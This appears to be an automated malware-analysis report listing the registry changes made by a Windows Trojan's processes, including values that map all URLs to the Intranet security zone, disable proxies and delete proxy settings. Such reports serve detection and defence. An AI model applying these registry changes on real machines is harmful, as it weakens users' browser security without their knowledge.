[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\´óÌìʹ֮½£]
"DisplayName" = "´óÌìʹ֮½£"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\´óÌìʹ֮½£]
"DisplayIcon" = "%Documents and Settings%\%current user%\Application Data\dts\mydts\dts.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F5 99 50 CC B8 CB D3 3C 05 16 D9 31 F4 52 6C 41"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
The process MM-liao8398.exe:824 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014122020141221]
"CacheOptions" = "11"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014122020141221]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014122020141221\"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\9158ktv\DownLoad]
"9158chat2_ktv083_98.exe" = "9158chat2_ktv083_98"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014122020141221]
"CacheLimit" = "8192"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "MM-liao8398.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014122020141221]
"CacheRepair" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\QuanQuan]
"LastTime" = "Type: REG_QWORD, Length: 8"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 19 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1413899698"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 E8 6B FF E9 5E C7 46 CA A3 F0 95 F2 A6 F6 F2"
[HKLM\SOFTWARE\QuanQuan]
"RunCount" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014122020141221]
"CachePrefix" = ":2014122020141221:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013041720130418]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:1452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "77 61 03 27 91 D4 87 08 8F D0 65 E9 A4 53 D3 B0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process notify.exe:2104 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\PPTAssist\Common\minisite]
"Address" = "ZmlsZTovLy8lYXBwcm9vdCVcbWluaXNpdGVcMS4wXGluZGV4Lmh0bWw="
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\PPTAssist\Common\minisite]
"timebucket" = "11:40:00-14:00:00,17:20:00-20:00:00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\PPTAssist\Common\updateinfo]
"notifysettingetag" = "7139DDC4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\PPTAssist\Common\minisite]
"idleContinueSecond" = "240"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\PPTAssist\Common\minisite]
"switch" = "3"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\PPTAssist\Common\updateinfo]
"LastNotifyTime" = "2014-12-20 02:06:01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 8F 8B DD D8 B7 00 AD B7 AF B7 4D ED 37 0F 60"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\PPTAssist\Common\updateinfo]
"LastKsoActive" = "2014-12-20 02:06:14"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process 9158chat2_ktv083_98.exe:516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\9158Service]
"IsGuest" = "1"
[HKLM\SOFTWARE\9158web]
"StartTime" = "12200205"
[HKLM\SOFTWARE\9158Service]
"TopLevel" = "1"
"Open" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\9158web]
"MainRun" = "d:\Program Files\9158KTV\9158.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\9158Service]
"LastPlat" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9158¶àÈËÊÓÆµ]
"DisplayVersion" = "6.800"
"DisplayName" = "9158¶àÈËÊÓÆµ"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\9158Service]
"PlatName" = "9158¶àÈËÊÓÆµ"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\MozillaPlugins\@9158.com/nplogin]
"Path" = "d:\Program Files\9158KTV\nplogin.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 39 3E D3 F3 BC 60 64 40 BE D6 DD 2F FF EA 08"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9158¶àÈËÊÓÆµ]
"UninstallString" = "d:\Program Files\9158KTV\Uninst.exe"
"Publisher" = "Ìì¸ñ¿Æ¼¼£¨º¼Öã©ÓÃÂÃÂÞ¹«Ë¾"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9158¶àÈËÊÓÆµ]
"URLInfoAbout" = "http://www.9158.com/"
The process assistupdate.exe:2080 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B3 E4 04 70 F5 F4 A5 52 A4 52 43 B8 76 1E A2 1E"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
The process dts.exe:1940 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "57 D1 B0 B4 A5 07 55 FF 8A 3C B5 8F 6B E8 79 72"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process dts.exe:1728 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "42 27 A4 56 D5 0B BD EF 0C 01 85 38 9E 40 7D 22"
The process dts.exe:1772 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "94 84 70 76 50 17 53 A0 4E 4A 95 5F FB 3C 7D 36"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process 1419052427l238l63518.exe&_upt=6ec6a9a21419053027:1812 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 18 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
